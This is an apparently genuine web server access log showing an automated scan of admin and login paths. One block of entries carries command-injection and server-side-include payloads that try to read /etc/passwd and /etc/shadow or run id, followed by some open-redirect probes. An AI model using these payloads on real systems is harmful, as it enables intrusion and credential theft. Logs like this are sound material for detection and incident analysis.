195.164.49.69 - - [20/Oct/2024:21:18:35 +0000] GET /html/login.html HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:21:18:37 +0000] GET /web/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:18:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:18:41 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:18:44 +0000] GET /app/login HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:21:18:46 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:18:48 +0000] GET /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:18:50 +0000] GET /adminer/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:18:52 +0000] GET /editor.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:18:54 +0000] GET /mysql.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:18:56 +0000] GET /sql.php HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:18:58 +0000] GET /wp-content/plugins/adminer/adminer.php HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:21:19:00 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:19:02 +0000] GET /modules/sfkdbmanage/adminer.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:21:19:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:19:06 +0000] GET /oauth2/authorize HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:21:19:08 +0000] GET /login/locales/login_en.json HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:19:10 +0000] GET /minio/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:19:12 +0000] GET /mifs/login.jsp HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:19:14 +0000] GET /mifs/user/login.jsp HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:19:16 +0000] GET /mifs/c/d/android.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:19:18 +0000] GET /RDWeb/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:19:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:19:22 +0000] GET /sonicui/7/login/ HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:19:24 +0000] GET /ossim/session/login.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:21:19:26 +0000] GET /uddiexplorer/ HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:19:29 +0000] GET /DocuWare/Identity/Account/Login HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:21:19:31 +0000] GET /pem/login/pages/login.jsf HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:19:33 +0000] GET /site_admin/user/login HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:19:35 +0000] GET /web/database/manager HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:21:19:37 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:19:39 +0000] GET /console/index.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:21:19:41 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:19:43 +0000] GET /login.jsp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:19:45 +0000] GET /login.htm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:19:47 +0000] GET /cxrestapi/help/system/version HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:21:19:49 +0000] GET /cxwebclient/Login.aspx HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:21:19:51 +0000] GET /cxrestapi/auth/identity/.well-known/openid-configuration HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:21:19:53 +0000] GET /authentication/login HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:19:55 +0000] GET /cgi-bin/luci HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:19:57 +0000] GET /owa/auth/logon.aspx?replaceCurrent=1&url=https://sdc.iopan.pl:443/ecp HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:21:19:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:20:01 +0000] GET /portal/portalhelp/en/ HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:21:20:03 +0000] GET /status.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:20:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:20:08 +0000] GET /identification.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:20:10 +0000] GET /weblogin.htm HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:20:12 +0000] GET /enginemanager/ftu/welcome.htm HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:21:20:17 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:20:19 +0000] GET /Login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:20:21 +0000] GET /NmConsole HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:20:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:20:26 +0000] GET /era/webconsole/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:20:28 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:20:30 +0000] GET /graph/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:21:20:32 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:20:34 +0000] GET /dashboard/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:21:20:36 +0000] GET /pwdform.htm HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:20:38 +0000] GET /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:20:40 +0000] GET /auth.html HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:20:42 +0000] GET /app/template/Login.vm HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:21:20:44 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:21:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:21:20:46 +0000] GET /archibus/login.axvw HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:20:48 +0000] GET /archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp HTTP/1.1 404 1146
195.164.49.69 - - [20/Oct/2024:21:20:50 +0000] GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:21:20:52 +0000] GET /kiali/api/status HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:21:20:54 +0000] GET /kiali/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:20:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:20:58 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:21:21:00 +0000] GET /plugins/CoreHome/images/favicon.png HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:21:21:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:21:04 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:21:06 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:21:09 +0000] GET /explore HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:21:21:10 +0000] GET /api/v4/projects HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:21:12 +0000] GET /user HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:21:21:15 +0000] GET /login.do HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:21:17 +0000] GET /sws/index.sws HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:21:21:19 +0000] GET /login.do HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:21:21:21 +0000] GET /login/login.do HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:21:23 +0000] GET /manager/login.do HTTP/1.1 404 1545
195.164.49.69 - - [20/Oct/2024:21:21:25 +0000] GET /Default.aspx?pid=Login HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:21:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:21:29 +0000] GET /mylittleadmin/ HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:21:21:36 +0000] GET /index.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:21:21:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:21:41 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:21:21:44 +0000] GET /download/inc/config.inc.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:21:21:45 +0000] GET /inc_config.inc.php._txt HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:21:21:47 +0000] GET /download/inc/tables.inc.php HTTP/1.1 404 1109
<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> - - [20/Oct/2024:21:21:59 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> - - [20/Oct/2024:21:21:59 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/usr/bin/id;--> - - [20/Oct/2024:21:21:59 +0000] GET / HTTP/1.1 417 1054
<!--#exec%20cmd="/usr/bin/id;--> - - [20/Oct/2024:21:21:59 +0000] GET / HTTP/1.1 417 1054
/index.html|id| - - [20/Oct/2024:21:22:00 +0000] GET / HTTP/1.1 417 1054
;id; - - [20/Oct/2024:21:22:00 +0000] GET / HTTP/1.1 417 1054
;id - - [20/Oct/2024:21:22:00 +0000] GET / HTTP/1.1 417 1054
;netstat -a; - - [20/Oct/2024:21:22:00 +0000] GET / HTTP/1.1 417 1054
;system('cat%20/etc/passwd') - - [20/Oct/2024:21:22:01 +0000] GET / HTTP/1.1 417 1054
;id; - - [20/Oct/2024:21:22:01 +0000] GET / HTTP/1.1 417 1054
|id - - [20/Oct/2024:21:22:01 +0000] GET / HTTP/1.1 417 1054
|/usr/bin/id - - [20/Oct/2024:21:22:01 +0000] GET / HTTP/1.1 417 1054
83.212.98.101 - - [20/Oct/2024:21:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
|id| - - [20/Oct/2024:21:22:44 +0000] GET / HTTP/1.1 417 1054
|/usr/bin/id| - - [20/Oct/2024:21:22:48 +0000] GET / HTTP/1.1 417 1054
||/usr/bin/id| - - [20/Oct/2024:21:22:48 +0000] GET / HTTP/1.1 417 1054
|id; - - [20/Oct/2024:21:22:48 +0000] GET / HTTP/1.1 417 1054
||/usr/bin/id; - - [20/Oct/2024:21:22:49 +0000] GET / HTTP/1.1 417 1054
;id| - - [20/Oct/2024:21:22:49 +0000] GET / HTTP/1.1 417 1054
;|/usr/bin/id| - - [20/Oct/2024:21:22:49 +0000] GET / HTTP/1.1 417 1054
\n/bin/ls -al\n - - [20/Oct/2024:21:22:49 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id\n - - [20/Oct/2024:21:22:50 +0000] GET / HTTP/1.1 417 1054
\nid\n - - [20/Oct/2024:21:22:50 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id; - - [20/Oct/2024:21:22:50 +0000] GET / HTTP/1.1 417 1054
\nid; - - [20/Oct/2024:21:22:51 +0000] GET / HTTP/1.1 417 1054
\n/usr/bin/id| - - [20/Oct/2024:21:22:51 +0000] GET / HTTP/1.1 417 1054
\nid| - - [20/Oct/2024:21:23:35 +0000] GET / HTTP/1.1 417 1054
;/usr/bin/id\n - - [20/Oct/2024:21:23:36 +0000] GET / HTTP/1.1 417 1054
;id\n - - [20/Oct/2024:21:23:36 +0000] GET / HTTP/1.1 417 1054
|usr/bin/id\n - - [20/Oct/2024:21:23:37 +0000] GET / HTTP/1.1 417 1054
|nid\n - - [20/Oct/2024:21:23:37 +0000] GET / HTTP/1.1 417 1054
`id` - - [20/Oct/2024:21:23:38 +0000] GET / HTTP/1.1 417 1054
`/usr/bin/id` - - [20/Oct/2024:21:23:38 +0000] GET / HTTP/1.1 417 1054
a);id - - [20/Oct/2024:21:23:38 +0000] GET / HTTP/1.1 417 1054
a;id - - [20/Oct/2024:21:23:39 +0000] GET / HTTP/1.1 417 1054
a);id; - - [20/Oct/2024:21:23:39 +0000] GET / HTTP/1.1 417 1054
a;id; - - [20/Oct/2024:21:23:39 +0000] GET / HTTP/1.1 417 1054
a);id| - - [20/Oct/2024:21:23:40 +0000] GET / HTTP/1.1 417 1054
a;id| - - [20/Oct/2024:21:24:21 +0000] GET / HTTP/1.1 417 1054
a)|id - - [20/Oct/2024:21:24:24 +0000] GET / HTTP/1.1 417 1054
a|id - - [20/Oct/2024:21:24:25 +0000] GET / HTTP/1.1 417 1054
a)|id; - - [20/Oct/2024:21:24:25 +0000] GET / HTTP/1.1 417 1054
a|id - - [20/Oct/2024:21:24:26 +0000] GET / HTTP/1.1 417 1054
|/bin/ls -al - - [20/Oct/2024:21:24:26 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id - - [20/Oct/2024:21:24:26 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id - - [20/Oct/2024:21:24:27 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id; - - [20/Oct/2024:21:24:27 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id; - - [20/Oct/2024:21:24:27 +0000] GET / HTTP/1.1 417 1054
a);/usr/bin/id| - - [20/Oct/2024:21:24:28 +0000] GET / HTTP/1.1 417 1054
a;/usr/bin/id| - - [20/Oct/2024:21:24:28 +0000] GET / HTTP/1.1 417 1054
a)|/usr/bin/id - - [20/Oct/2024:21:24:28 +0000] GET / HTTP/1.1 417 1054
a|/usr/bin/id - - [20/Oct/2024:21:25:13 +0000] GET / HTTP/1.1 417 1054
a)|/usr/bin/id; - - [20/Oct/2024:21:25:14 +0000] GET / HTTP/1.1 417 1054
a|/usr/bin/id - - [20/Oct/2024:21:25:14 +0000] GET / HTTP/1.1 417 1054
;system('cat%20/etc/passwd') - - [20/Oct/2024:21:25:14 +0000] GET / HTTP/1.1 417 1054
;system('id') - - [20/Oct/2024:21:25:15 +0000] GET / HTTP/1.1 417 1054
;system('/usr/bin/id') - - [20/Oct/2024:21:25:15 +0000] GET / HTTP/1.1 417 1054
%0Acat%20/etc/passwd - - [20/Oct/2024:21:25:15 +0000] GET / HTTP/1.1 417 1054
%0A/usr/bin/id - - [20/Oct/2024:21:25:16 +0000] GET / HTTP/1.1 417 1054
%0Aid - - [20/Oct/2024:21:25:16 +0000] GET / HTTP/1.1 417 1054
%0A/usr/bin/id%0A - - [20/Oct/2024:21:25:16 +0000] GET / HTTP/1.1 417 1054
%0Aid%0A - - [20/Oct/2024:21:25:17 +0000] GET / HTTP/1.1 417 1054
| id - - [20/Oct/2024:21:25:17 +0000] GET / HTTP/1.1 417 1054
83.212.98.101 - - [20/Oct/2024:21:25:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
& id - - [20/Oct/2024:21:25:59 +0000] GET / HTTP/1.1 417 1054
; id - - [20/Oct/2024:21:26:03 +0000] GET / HTTP/1.1 417 1054
%0a id %0a - - [20/Oct/2024:21:26:03 +0000] GET / HTTP/1.1 417 1054
`id` - - [20/Oct/2024:21:26:03 +0000] GET / HTTP/1.1 417 1054
$;/usr/bin/id - - [20/Oct/2024:21:26:04 +0000] GET / HTTP/1.1 417 1054
$(`cat /etc/passwd`) - - [20/Oct/2024:21:26:04 +0000] GET / HTTP/1.1 417 1054
cat /etc/passwd - - [20/Oct/2024:21:26:04 +0000] GET / HTTP/1.1 417 1054
%0Acat%20/etc/passwd - - [20/Oct/2024:21:26:05 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:21:26:05 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:21:26:06 +0000] GET / HTTP/1.1 417 1054
system('cat /etc/passwd'); - - [20/Oct/2024:21:26:06 +0000] GET / HTTP/1.1 417 1054
- - [20/Oct/2024:21:26:06 +0000] GET / HTTP/1.1 417 1054
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET //example.com/ HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET /.example.com HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET /example.com/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET /example.com HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET //%5C%5Cexample.com/%252e%252e%252f HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:21:27:15 +0000] GET //http%3A%2F%2Fexample.com HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:21:27:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:21:27:21 +0000] GET /v2/keys/ HTTP/1.1 404 1090
83.212.98.101 - - [20/Oct/2024:21:27:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:21:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:21:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:05:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:40:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:22:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:22:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:00:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:23:04:09 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:23:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
77.87.163.227 - - [20/Oct/2024:23:09:57 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
83.212.98.101 - - [20/Oct/2024:23:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:20:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:37:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:23:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:23:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074